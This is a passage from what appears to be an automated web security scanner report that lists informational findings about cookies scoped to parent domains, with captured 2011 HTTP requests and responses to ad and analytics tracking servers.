GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1968

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

12.31. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:15:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1712

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...

12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A25%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone&r=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&cc=USD&c5=xss%20faq%20help%20contact%20phone&c20=New&v20=New&v24=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:25 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664231-3A57-2150C7DC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www81
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845?AQB=1&ndh=1&t=6/8/2011%2015%3A58%3A5%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss&r=http%3A//www.oracle.com/openworld/tools/mobile/index.html&cc=USD&c5=xss&c20=New&v20=New&c24=no%20value&v24=http%3A//www.oracle.com/openworld/tools/mobile/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:58:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:58:06 GMT
Last-Modified: Wed, 07 Sep 2011 15:58:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66430E-6576-4E5300FE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www179
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499?AQB=1&ndh=1&t=6/8/2011%2015%3A56%3A13%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&v24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Results&pidt=1&oid=javascript%3AsearchDuplicateLink%281%2C10%2C482523%29%3B&ot=A&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:56:14 GMT
Last-Modified: Wed, 07 Sep 2011 15:56:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66429E-469A-637CA977"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www107
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A46%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&v24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Query&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:47 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664247-443F-7E91E57E"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A33%202%20300&pageName=Search%3A%20All%3A%20Query&g=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&r=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&v24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Error%3A404%3Ahttp%3A//www.oracle.com/us/sitemaps/sitemaps.html&pidt=1&oid=functiononclick%28event%29%7Bjavascript%3Adocument.searchForm.keyword.value%3D%27%27%7D&oidt=2&ot=TEXT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:34 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66423A-1A91-321F443B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www118
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

